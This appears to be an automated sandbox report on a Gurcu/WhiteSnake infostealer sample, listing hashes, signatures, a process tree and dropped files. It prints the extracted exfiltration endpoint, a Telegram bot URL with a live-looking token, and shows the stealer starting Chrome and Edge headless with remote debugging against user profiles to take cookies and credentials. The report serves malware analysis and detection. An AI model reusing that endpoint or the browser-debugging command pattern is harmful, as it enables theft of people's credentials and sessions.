Analysis

  • max time kernel
    125s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/04/2025, 10:33

General

  • Target

    2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe

  • Size

    5.7MB

  • MD5

    2c2efc29fc75c25b90e1472e30e7be0a

  • SHA1

    bf4d7300c88893be11e8b8c1cd84be7a421544ef

  • SHA256

    def69023e3e78c66804a4a7996607540cb2c6f57eeda633a04720ce39291b103

  • SHA512

    4bfc52b2abfbc478b37c29e4f642d63aa7031e502a637175e4c0e79b86a453f3e593e60a654f2f5fd2bebeb31c135c7c90d198ff738624d33d34dd3bbcdad5e7

  • SSDEEP

    98304:DWl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uczq:DtOuK6mn9NzgMoYkSIvUcwti7TQlvcij

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7762282231:AAHXw4eRj3GOllE1bbAM7ABgQpzu_mwXV8c/sendDocument?chat_id=-4788462796&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20212.102.63.147%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu
      2⤵
      • Uses browser remote debugging
      • Checks processor information in registry
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c18dcf8,0x7ff84c18dd04,0x7ff84c18dd10
        3⤵
          PID:4560
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2008,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1996 /prefetch:2
          3⤵
            PID:4216
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2176,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2172 /prefetch:3
            3⤵
              PID:5480
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2308,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2312 /prefetch:8
              3⤵
                PID:4800
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3140 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:4744
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3168 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:5244
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4236,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4232 /prefetch:2
                3⤵
                • Uses browser remote debugging
                PID:1532
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4620 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:3712
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5256,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5228 /prefetch:8
                3⤵
                  PID:3100
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5456,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5432 /prefetch:8
                  3⤵
                    PID:2536
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5496,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5500 /prefetch:8
                    3⤵
                      PID:3124
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5228,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5524 /prefetch:8
                      3⤵
                        PID:636
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5336,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5312 /prefetch:8
                        3⤵
                          PID:5852
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5524,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5652 /prefetch:8
                          3⤵
                            PID:4976
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5240,i,6350174787354925333,16912334515421945917,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5380 /prefetch:1
                            3⤵
                            • Uses browser remote debugging
                            PID:3612
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --disable-gpu
                          2⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          • Suspicious use of FindShellTrayWindow
                          PID:3888
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2a4,0x7ff84ceef208,0x7ff84ceef214,0x7ff84ceef220
                            3⤵
                              PID:5424
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2276,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2
                              3⤵
                                PID:3100
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2312,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:3
                                3⤵
                                  PID:3920
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2588,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:8
                                  3⤵
                                    PID:5276
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3532,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
                                    3⤵
                                    • Uses browser remote debugging
                                    PID:4700
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
                                    3⤵
                                    • Uses browser remote debugging
                                    PID:4164
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4988,i,5116602807649470947,1885021473823269398,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4984 /prefetch:1
                                    3⤵
                                    • Uses browser remote debugging
                                    PID:1740
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB3DF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB3DF.tmp.bat
                                  2⤵
                                    PID:3992
                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                  1⤵
                                    PID:2476
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                    1⤵
                                      PID:2152
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                      1⤵
                                        PID:4604

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\4e266fbb-daac-4a37-a25c-5dfd1c8491df.tmp

                                        Filesize

                                        79KB

                                        MD5

                                        39b945cfb3c33402178a3f5324b73874

                                        SHA1

                                        2080f79539259808fd8da3b6836e07257a74191e

                                        SHA256

                                        e128ba3b7bf3179d7f2e7040e5c9611dea7874a02105aaad1842f59264e28ae9

                                        SHA512

                                        cd182ab179a3a490a6142bd411e36cb081e7f798fc44510a3611f4712e18846a4ab070b3ef616c7f471652fb9bf74c23f349852ba57706bd61f3d3282384d396

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                        Filesize

                                        649B

                                        MD5

                                        ac95d4912f1136d4c63ed3ff0ab68ff7

                                        SHA1

                                        deb8b9b69d5e223c477428742092fdf905b98feb

                                        SHA256

                                        4476ee3216c6eaa39a8b5816897af246eeb212333d4cf61ac9f840c93c677178

                                        SHA512

                                        ac1ad25948ee6cdb6d1c02dec25488cd344883241701eb9625be47bf2b6fb1cc3afc07b0e0631a7a5c01b257587cc4fe9a1a540f23ec548447698f4be2031123

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                        Filesize

                                        2B

                                        MD5

                                        d751713988987e9331980363e24189ce

                                        SHA1

                                        97d170e1550eee4afc0af065b78cda302a97674c

                                        SHA256

                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                        SHA512

                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                        Filesize

                                        280B

                                        MD5

                                        7b0736a36bad51260e5db322736df2e9

                                        SHA1

                                        30af14ed09d3f769230d67f51e0adb955833673e

                                        SHA256

                                        0d2adfd06d505b9020c292d30597083d808bfd90ddc0fe173def5db96832a087

                                        SHA512

                                        caabdc6a8601b93f3c082e6506b3c9efe2242b90e92e86306dc0bd4857d33343ba395325fabb21f5db562d3e3932f52f77de547f379072d0154efd5f1b1cdeb3

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\81a7aa5b-1bcb-483d-891d-e5c84ac500a5.tmp

                                        Filesize

                                        1B

                                        MD5

                                        5058f1af8388633f609cadb75a75dc9d

                                        SHA1

                                        3a52ce780950d4d969792a2559cd519d7ee8c727

                                        SHA256

                                        cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                        SHA512

                                        0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index

                                        Filesize

                                        1KB

                                        MD5

                                        6d831169db1aa9be73379aa2765b2c61

                                        SHA1

                                        5f3c21d7d2ea8539ec8850686b88decd79deb076

                                        SHA256

                                        7bb3cdad80c7ef80fed9e59cf0b355a13a73342c753cd52acc05edc2b9b50b7d

                                        SHA512

                                        080e1f92868e43192964ebbf461ebf0b7be480fafba8033e4daeed265f6d30cd8e347e4af4f9e3242db0ea3f381873f321beb0ec10684bcc0f75a1c6b7d0ab05

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b31ac5d5-f3c9-4706-bd69-fa1295cda083\index-dir\the-real-index~RFe57a1fd.TMP

                                        Filesize

                                        1KB

                                        MD5

                                        ede161ea8c315775c06f94b0f2fb9c0d

                                        SHA1

                                        1ebf466c45bcfe87fabcde7f8a682505710d2bb8

                                        SHA256

                                        f1e9691ef91d9dbceebaa7661d7b8d81070c8089e48657824cbdfbfda04ddfa9

                                        SHA512

                                        1dc52d82f99ea57b2a260b56851b42966900878bbfcc9a070497c8e110612520ad10c152e464f3514bdb184d7bf03e36d66532a4672692d1cfd433dce77913f5

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        40KB

                                        MD5

                                        da7fdd95f6c55d2f9d1c370aa7587d83

                                        SHA1

                                        44f803d2b14d9c88fec2d1becac50a9e33dd46b4

                                        SHA256

                                        48cc8c8d34dc35a44f5ec4473110abadc42a0f46f6b6fc9f4b9cceddc6cd7569

                                        SHA512

                                        0bf0b37f74a29e3a7956eb62061a2d8428a93825ab5a1e787cb7f7eeba4959bec8537842b3b21dd6f923334482c67d556c7e87ab6314714ca1890f3fe8171388

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        40KB

                                        MD5

                                        3e7675c78cbe743461a59291de182863

                                        SHA1

                                        78e000b31cd7b3e2b15cbd87eac0bd4777e960ca

                                        SHA256

                                        9cb11fa766bafa3533978f8747f65c406e7126429ddbccc1dc36993d33259f44

                                        SHA512

                                        39257e4a68ea8e1ff7646ae9c3079aa9b1d11e637f2970a620254b9e6071e998760bd1bf4fb7c64217dfad3b406a769452677cb7308ee82787c82e8e1bfbecb2

                                      • C:\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll

                                        Filesize

                                        1.7MB

                                        MD5

                                        65ccd6ecb99899083d43f7c24eb8f869

                                        SHA1

                                        27037a9470cc5ed177c0b6688495f3a51996a023

                                        SHA256

                                        aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                                        SHA512

                                        533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

                                      • C:\Users\Admin\AppData\Local\Temp\scoped_dir4544_88161676\b963daa1-cd15-4f9a-9f66-0dc91d5ddae1.tmp

                                        Filesize

                                        152KB

                                        MD5

                                        dd9bf8448d3ddcfd067967f01e8bf6d7

                                        SHA1

                                        d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                        SHA256

                                        fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                        SHA512

                                        65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                      • C:\Users\Admin\AppData\Local\Temp\tmpB3DF.tmp.bat

                                        Filesize

                                        249B

                                        MD5

                                        58bee18be9c68406c39501230ff4f7fe

                                        SHA1

                                        b8b1d4c3bb370510b18e617de477e7e7fb89ee93

                                        SHA256

                                        a20543b045ab80fe2a0d1a5767bc70442dcf17b2133a0f6e7e9fd28cd16e6e2e

                                        SHA512

                                        54e2fa988b293519dfd5c0d9304a4b032842bd06cdb24014f87aa58effc916d0608b6f759c47f2d732651260a48c3bac0179d886af5c2f23d0a86f9fef3d5871

                                      • C:\Users\Admin\AppData\Roaming\AdminUserCash\CREDIT~1

                                        Filesize

                                        228KB

                                        MD5

                                        ee463e048e56b687d02521cd12788e2c

                                        SHA1

                                        ee26598f8e8643df84711960e66a20ecbc6321b8

                                        SHA256

                                        3a07b3003758a79a574aa73032076567870389751f2a959537257070da3a10d8

                                        SHA512

                                        42b395bf6bd97da800385b9296b63a4b0edd7b3b50dc92f19e61a89235a42d37d204359b57d506e6b25ab95f16625cce035ed3b55ef2d54951c82332498dab0f

                                      • memory/3448-369-0x00000249FDA80000-0x00000249FDAD0000-memory.dmp

                                        Filesize

                                        320KB

                                      • memory/3448-452-0x00007FF851AB0000-0x00007FF852571000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3448-7-0x00000249FCC20000-0x00000249FCC96000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/3448-374-0x00000249FDAD0000-0x00000249FDB0A000-memory.dmp

                                        Filesize

                                        232KB

                                      • memory/3448-375-0x00000249FCF10000-0x00000249FCF36000-memory.dmp

                                        Filesize

                                        152KB

                                      • memory/3448-1-0x00000249E2170000-0x00000249E2726000-memory.dmp

                                        Filesize

                                        5.7MB

                                      • memory/3448-52-0x00000249FCEE0000-0x00000249FCF02000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/3448-0-0x00007FF851AB3000-0x00007FF851AB5000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3448-408-0x00007FF851AB3000-0x00007FF851AB5000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/3448-349-0x00000249FD9C0000-0x00000249FDA2A000-memory.dmp

                                        Filesize

                                        424KB

                                      • memory/3448-6-0x00000249E2B40000-0x00000249E2B4A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/3448-11-0x00000249FCCA0000-0x00000249FCD52000-memory.dmp

                                        Filesize

                                        712KB

                                      • memory/3448-10-0x00000249E2C00000-0x00000249E2C3E000-memory.dmp

                                        Filesize

                                        248KB

                                      • memory/3448-568-0x00000249FDB70000-0x00000249FDB82000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/3448-582-0x00007FF851AB0000-0x00007FF852571000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/3448-9-0x00000249E2B50000-0x00000249E2B6E000-memory.dmp

                                        Filesize

                                        120KB

                                      • memory/3448-8-0x00007FF851AB0000-0x00007FF852571000-memory.dmp

                                        Filesize

                                        10.8MB